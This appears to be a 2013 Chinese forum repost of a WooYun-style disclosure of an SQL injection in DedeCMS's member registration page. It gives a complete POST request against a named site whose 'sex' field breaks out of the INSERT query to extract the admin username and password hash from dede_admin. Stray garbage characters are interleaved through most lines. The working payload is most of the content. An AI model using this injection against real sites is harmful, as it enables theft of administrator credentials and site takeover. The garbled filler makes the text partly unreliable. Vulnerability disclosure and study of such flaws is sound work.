漏洞类型: SQL注射漏洞
+ A' d( w3 D0 @+ K简要描述:7 }8 m5 q, C* Q4 @
, L) h6 Z/ F+ T8 A6 p$ V# b需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞., z v5 l9 P O7 ~
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.; ] ?* k" l0 @- V( K& B' H
详细说明:跟这个漏洞
. y' T% a1 e- y: Z- \ ' ^1 H v& C4 |* \
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
: ~ N+ B2 }% B是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
4 ~6 h# Y* |0 DPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
9 k" s! t/ p ^7 R! q . T' z! O C- S; I, s
www.political-security.com/member/reg_new.php7 |" s- G0 C1 Y9 n$ j9 l
: q- O; G. N0 x1 @POST0 h! i& t3 _- h6 P7 y
" t) ^$ b7 j( R9 A! [( M
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
\% Z/ Q6 `; L1 ]1 xuserid=c4rp3nt3r&uname=c4rp3nt3r" ^- ?# p5 \- b5 x% f5 o3 Z
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss3 q2 z3 b ^' T# z4 g7 u! J
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,2 @6 [- G1 u; P& C
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
; j& M' B8 _) v, b1 P%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对